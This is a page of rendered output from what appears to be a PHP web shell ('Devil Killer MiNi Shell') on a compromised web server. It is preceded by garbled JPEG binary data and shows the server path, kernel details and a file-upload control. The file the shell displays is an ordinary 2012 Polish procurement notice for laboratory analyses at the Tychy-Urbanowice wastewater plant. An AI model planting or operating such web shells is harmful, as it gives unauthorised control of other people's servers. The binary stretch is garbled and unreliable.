JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120126/25400-N-2012.html

<p class="kh_header"><b>Tychy: Wykonywanie analiz laboratoryjnych dla Oczyszczalni Ścieków Tychy-Urbanowice</b><br>
<b>Numer ogłoszenia: 25400 - 2012; data zamieszczenia: 26.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: osoba prawna utworzona w celu zaspokajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie analiz laboratoryjnych dla Oczyszczalni Ścieków Tychy-Urbanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie analiz laboratoryjnych prób ścieków, osadów, wód podziemnych i powierzchniowych, rudy darniowej, olejów oraz biogazu, spalin i pomiar emisji zanieczyszczeń gazowych do atmosfery dla oczyszczalni ścieków Tychy-Urbanowice.

CZĘŚĆ 1 - Wykonywanie analiz laboratoryjnych ścieków, osadu ściekowego, wód podziemnych i powierzchniowych oraz rudy darniowej dla Oczyszczalni Ścieków w Tychy-Urbanowice.

1A.Analizy ścieków:
a.	ChZTCr -  100 analiz/rok,
b.	BZT5 - 100 analiz/rok,
c.	Zawiesina ogólna - 100 analiz/rok,
d.	Azot ogólny (z rozbiciem na azot amonowy, azotynowy, azotanowy, Kjeldahla) - 100 analiz/rok,
e.	Fosforany rozpuszczone - 100 analiz/rok,
f.	Fosfor ogólny - 100 analiz/rok,
g.	Substancje ropopochodne - 100 analiz/rok.

  2A.Analiza ścieków w zakresie: fenole lotne, chlorki, siarczany, rtęć, kadm, cynk, miedź, nikiel, chrom, ołów, arsen, wanad, srebro, heksachlorocykloheksan (HCH), tetrachlorometan (czterochlorek węgla - CCl4), pentachlorofenol (PCP), aldryna, dieldryna, endryna, izodryna, heksachlorobenzen (HCB), heksachlorobutadien (HCBD), trichlorometan (chloroform - CHCl3), 1,2-dichloroetan (EDC), trichloroetylen (TRI), tetrachloroetylen (nadchloroetylen - PER), trichlorobenzen (TCB)- 4 analizy/rok 
 
3A.Analiza osadu ściekowego w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 13 lipca 2010 r. w sprawie komunalnych osadów ściekowych wraz z wydaniem opinii - 8 analiz/rok,

4A.Analiza wód podziemnych w zakresie: odczyn, przewodność elektryczna właściwa PEW, ołów, kadm, miedź, cynk, chrom VI, rtęć, bor, sód, magnez, glin, potas, wapń, mangan, ogólny węgiel organiczny OWO, wodorowęglany, ortofosforany, chlorki, siarczany, amoniak, azotyny, azotany, indeks fenolowy, substancje powierzchniowo czynne- anionowe- 4 analizy/rok

5A. Analiza wód powierzchniowych w zakresie ChZTCr , BZT5, zawiesina ogólna, azot ogólny (z rozbiciem na azot amonowy, azotynowy, azotanowy, Kjeldahla), fosforany rozpuszczone, fosfor ogólny, substancje ropopochodne- 4 analizy /rok

6A. Analizy rudy darniowej:
a)	Oznaczenie żelaza ogólnego, żelaza Fe 2+, pH wyciągu wodnego, pozostałość nierozpuszczalna w HCl, wilgotność - 1 analiza/rok

CZĘŚĆ 2 - Wykonywanie analiz laboratoryjnych biogazu, spalin i pomiar emisji dla Oczyszczalni Ścieków w Tychy-Urbanowice.

1B. Analiza biogazu:
a)	Przed instalacją odsiarczania H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] - 6 analiz/rok.
b)	Za instalacją odsiarczania: O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3] , wilgotność, wartość opałowa [Mg/Nm3] - 6 analizy/rok,
c)	Za instalacją odsiarczania: badanie związków krzemu w zakresie: tetrametylosilan, trimetylosilanol, heksametylodisiloksan, heksametylocyklotrisiloksan, oktametylotrisiloksan, oktametylocyklotetrasiloksan, dekametylotetrasiloksan, dekametylocyklopentasiloksan- 4 analizy/rok

2B. Analiza spalin (pomiar emisji zanieczyszczeń w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 19.11.2008 r.):
	a) CO, CO2, NOx, SO2, pyły- 8 analiz/rok

CZĘŚĆ 3 - Wykonywanie analiz laboratoryjnych oleju silnikowego dla Oczyszczalni Ścieków Tychy-Urbanowice 

1C. Badanie oleju silnikowego w zakresie: 
a)	IpH, żelazo, ołów, miedź, cyna, chrom, glin,  nikiel, bor, sód, krzem obcy, zawartość wody, płyn chłodzący, liczba kwasowa, liczba zasadowa, lepkość w 400C, lepkość w 1000C, wskaźnik lepkości - 24 analizy/rok
b)	stopień oksydacji oleju, oksydacja oleju netto, stopień nitrowania oleju netto w porównaniu ze wzorcem oleju oraz wydanie opinii, czy dany olej nadaje się do dalszego stosowania w silnikach opalany biogazem- 24 analizy /rok

2.	Informacje szczegółowe dotyczące zamówienia:
	Część 1 zamówienia: 
1)	Próby ścieków, wód powierzchniowych i osadów do badań pobierane będą przez przedstawiciela Zamawiającego.
2)	Próby osadu ściekowego do badania w zakresie określonym w Rozporządzeniu Ministra Środowiska z dnia 13 lipca 2010r. Zamawiający przekaże Wykonawcy w tych samych dniach, co próby ścieków do badania w zakresie pkt 1A oraz 2A i 5A.
3)	Pobór prób ścieków, osadu ściekowego, wód podziemnych oraz ich transport z oczyszczalni do laboratorium odbywać się będzie w naczyniach laboratoryjnych, należących do Wykonawcy.
4)	Próby wód podziemnych z piezometrów P-1, P-2, P-3, P-4, znajdujących  się na terenie oczyszczalni ścieków będą pobrane przez Wykonawcę w ciągu jednego dnia.
5)	Odbiór próbek do analizy odbywać się będzie w dni robocze miesiąca (częstotliwość przyjazdów po próby do analizy: max 4 razy w m-cu po uprzednim zgłoszeniu przez Zamawiającego).
6)	Zamawiający będzie  ustalał miesięczny harmonogram wykonywania analiz ścieków oraz osadów i przesyłał do Wykonawcy do dnia 29 każdego miesiąca na następny miesiąc.
7)	Wykonawca ponosi koszty transportu próbek z oczyszczalni do miejsca wykonywania analizy laboratoryjnej. 
	
Część 2 zamówienia: 
1)	Pobór prób do badania biogazu oraz emisji odbywać się będzie tego samego dnia, po uprzednim, pisemnym zleceniu Zamawiającego, w którym zostanie określony termin realizacji (nie dłuższy niż 5 dni roboczych dni od przesłania pisemnego zlecenia).
2)	Pobór prób biogazu i prób do analizy spalin będzie wykonywany przez Wykonawcę.
3)	Pobór prób biogazu oraz ich transport z oczyszczalni do laboratorium odbywać się będzie w naczyniach laboratoryjnych, należących do Wykonawcy.
4)	Odbiór próbek do analizy odbywać się będzie w dni robocze miesiąca.
5)	Wykonawca ponosi koszty transportu próbek z oczyszczalni do miejsca wykonywania analizy laboratoryjnej.

Część 3 zamówienia: 
1)	Odbiór próbek oleju z oczyszczalni o odbywać się będzie po uprzednim, pisemnym zleceniu Zamawiającego, w którym zostanie określony termin realizacji (nie dłuższy niż 5 dni roboczych od przesłania pisemnego zlecenia).
2)	Wykonawca dostarczy pojemniki z etykietami do poboru prób oleju. Wykonawca ponosi koszty transportu prób do laboratorium. Wyniki analizy oleju Wykonawca ma przekazać Zamawiającemu do 5 dni roboczych od odebrania próbek oleju. Zamawiający dopuszcza sprawozdanie z badań olejów w formie elektronicznej. 
3)	Pobór prób oleju będzie wykonywany przez Zamawiającego. 
4)	Odbiór próbek do analizy odbywać się będzie w dni robocze miesiąca. 

3.	Metodyka badawcza: 
1)	Badania ścieków w zakresie pkt. 1A ppkt a-d oraz f-g; pkt. 2A oraz wód powierzchniowych (pkt 5A) należy wykonać zgodnie z metodami referencyjnymi wymienionymi w załączniku nr 2 do Rozporządzenia Ministra Środowiska z dnia 28 stycznia 2009r. zmieniającym rozporządzenie w sprawie warunków jakie należy spełniać przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. nr 27 poz 169).
2)	Badania osadów ściekowych należy wykonać zgodnie z metodami referencyjnymi wymienionymi w załączniku nr 4 do Rozporządzenia Ministra Środowiska z dnia 13 lipca 2010 r. w sprawie komunalnych osadów ściekowych (Dz.U. nr 137 poz. 924).
3)	W przypadku  parametrów wymienionych w pkt. 1A ppkt a-d oraz f-g, Zamawiający wymaga, aby analizy wykonano ściśle według metod i norm podanych w Rozporządzeniu Ministra Środowiska z dnia 28 stycznia 2009r, zmieniającym Rozporządzenie w sprawie warunków jakie należy spełniać przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. nr 27 poz.169). 
4)	W przypadku parametrów wymienionych w pkt 2A Zamawiający dopuszcza wykonanie analiz według innych norm niż wskazane w Rozporządzeniu Ministra Środowiska z dnia 28 stycznia 2009r. zmieniającym rozporządzenie w sprawie warunków jakie należy spełniać przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. nr 27 poz 169) lub według własnych procedur badawczych pod warunkiem, że będą one oparte na metodach pomiarowych określonych w Rozporządzeniu. Jeżeli norma wskazana w załączniku Rozporządzenia Ministra Środowiska z dnia 28 stycznia 2009r. zmieniającym rozporządzenie w sprawie warunków jakie należy spełniać przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. nr 27 poz 169)  została zastąpiona i wycofana, za normę zalecaną należy uznać nową normę znajdującą się w zbiorze Polskich Norm.
5)	W przypadku parametru azot ogólny (pkt 1A ppkt d), oznaczenie składowych tj. azotu amonowego, azotynowego, azotanowego i Kjeldahla należy wykonać ściśle według metod i norm podanych w Rozporządzeniu Ministra Środowiska z dnia 28 stycznia 2009r, zmieniającego Rozporządzenie w sprawie warunków jakie należy spełniać przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. nr 27 poz.169). 
6)	Wykonawca podając wynik parametru azot ogólny (jako suma składowych: azotu amonowego, azotynowego, azotanowego i Kjehdahla) musi stosować odpowiednią normę znajdującą się w zbiorze Polskich Norm lub własną procedurę badawczą.
7)	Jeżeli norma wskazana w załączniku do Rozporządzenia Ministra Środowiska z dnia 28 stycznia 2009r, zmieniającego Rozporządzenie w sprawie warunków jakie należy spełniać przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. nr 27 poz.169). została zastąpiona i wycofana, za normę zalecaną należy uznać nową normę znajdującą się w zbiorze Polskich Norm.
8)	Metoda referencyjna powinna być dobrana (zgodnie z podanymi w rozporządzeniu technikami) spośród metodyk znormalizowanych, a zakres oznaczania określony w normie powinien odpowiadać zakresowi stężeń występujących w badanym ścieku.
9)	Stosując metodyki referencyjne analizy, należy uwzględnić:
1)   wykrywalność rozumianą jako takie stężenie analitu, jakie można wykryć w badanej próbce daną metodą pomiarową, które odpowiada sygnałowi obliczonemu z wartości ślepej próby plus trzykrotność odchylenia standardowego; wyznacza się ją również jako średnią obliczoną z wyników oznaczeń minimum 10 próbek ślepych, po odrzuceniu wyników odbiegających, wykrytych testem Dixona;
2)   precyzję rozumianą jako stopień zgodności wyników wielokrotnych analiz tej samej próbki w określonych warunkach; miarą precyzji jest odchylenie standardowe (SD) lub względne odchylenie standardowe (RSD);
3)   dokładność rozumianą jako stopień zgodności między średnim wynikiem uzyskanym w szeregu powtórzeń a wartością prawdziwą mierzonej wartości.

10)	Wykonawca musi posiadać akredytację na wykonanie analizy:
- ścieków w zakresie określonym w pkt. 1A ppkt a-d oraz f-g;
- wód powierzchniowych w zakresie określonym w pkt. 5A;
- ścieków w zakresie określonym w pkt. 2A,
- osadu ściekowego w zakresie określonym pkt. 3A (oprócz opinii),
- wód podziemnych w zakresie określonym w pkt. 4A,
- spalin i pomiar emisji w zakresie określonym w pkt. 2B.

4.	Wymagania dot. podwykonawców: W przypadku analiz określonych w w/w pkt.3.10) na które
Zamawiający wymaga akredytacji, Wykonawca może powierzyć realizację zamówienia wyłącznie podwykonawcom, którzy posiadają Certyfikat Akredytacji Laboratorium Badawczego na wykonanie tych analiz. Zamawiający powierzając podwykonawcy wykonanie analiz określonych w w/w pkt.3.10) zobowiązany jest oświadczyć w pkt. 2d formularza OFERTY (załącznik nr 1 do siwz), iż podwykonawca ten posiada na powierzony mu zakres akredytację. W przypadku zaistnienia takiej sytuacji, Wykonawca wskazuje nr wymaganej akredytacji, datę jej ważności oraz organ, który wydał akredytację. 
Jeżeli podwykonawca posiada certyfikat akredytacji wraz z zakresem akredytacji sporządzony w języku obcym, wówczas Wykonawca winien załączyć do oferty tłumaczenie certyfikatu i jego zakresu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium dla poszczególnych części zamówienia wynosi:
Część 1 - 600,00 PLN (słownie: sześćset złotych), 
Część 2 - 200,00 PLN (słownie: dwieście złotych),
Część 3 - 600,00 PLN (słownie: sześćset złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek  jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna iz Wykonawca spełnił w/w warunek jeżeli:
a)	złoży podpisane oświadczenie, iż posiada w zakresie niniejszego zamówienia niezbędną wiedzę i doświadczenie - załącznik nr 2 siwz oraz,
b)	dla Część 1 zamówienia:

1.	potwierdzi należyte wykonanie analiz laboratoryjnych ścieków w zakresie określonym w pkt. III ppkt.1A siwz w ilości co najmniej 50 analiz/rok - osobno dla każdego parametru, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.

2.	potwierdzi należyte wykonanie analiz laboratoryjnych ścieków w pełnym zakresie określonym w pkt. III ppkt.2A siwz w ilości co najmniej 2 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.

3.	potwierdzi należyte wykonanie analiz laboratoryjnych osadu ściekowego w zakresie określonym w pkt.III ppkt.3A siwz w ilości co najmniej 4 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.

4.	potwierdzi należyte wykonanie analiz laboratoryjnych wód podziemnych w pełnym zakresie określonym w pkt.III ppkt.4A siwz w ilości co najmniej 2 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.

dla Części 2 zamówienia: 
1)	potwierdzi należyte wykonanie analiz laboratoryjnych biogazu w pełnym zakresie określonym w pkt.III ppkt.1B siwz w ilości co najmniej 3 analiz/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.

2)	potwierdzi należyte wykonanie analiz laboratoryjnych spalin w pełnym zakresie określonym w pkt.III ppkt.2B siwz, w ilości co najmniej 3 analizy/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
  
dla Części 3 zamówienia: 
1)	potwierdzi należyte wykonanie analiz laboratoryjnych oleju silnikowego w pełnym zakresie określonym w pkt.III ppkt.1C siwz w ilości co najmniej 8 analiz/rok dla każdego z paramentów określonych w podpunktach a) - b), w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.

W celu wykazania wymaganej przez Zamawiającego ilości analiz Zamawiający dopuszcza łączenie umów / zleceń wykonywanych na rzecz różnych podmiotów,  pod warunkiem, że analizy zostały zakończone. W treści załącznika nr 5 do siwz tj wykaz wykonanych usług, do każdej wykonanej usługi należy dopisać jej wartość, przedmiot datę wykonania i odbiorcę oraz załączyć dokument, potwierdzający, ze usługa ta została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna iz Wykonawca spełnił w/w warunek jeżeli złoży podpisane oświadczenie, iż dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna iz Wykonawca spełnił w/w warunek jeżeli złoży podpisane oświadczenie, iż dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna iz Wykonawca spełnił w/w warunek jeżeli złoży podpisane oświadczenie, iż dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - załącznik nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Ważny Certyfikat Akredytacji Laboratorium Badawczego (Wykonawcy,)  wraz z zakresem akredytacji na analizy, na które Wykonawca składa ofertę (co do których Zamawiający wymaga akredytacji), wydany przez Polskie Centrum Akredytacji lub inne jednostki certyfikujące, będące sygnatariuszami wielostronnego porozumienia EA lub ILAC - dot. Części 1 oraz części 2 zamówienia. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie dla osoby/osób do podpisania oferty oraz do występowania w imieniu Wykonawcy, jeżeli nie wynika to z innych dołączonych dokumentów-załącznik nr 4
W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 u.p.z.p</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
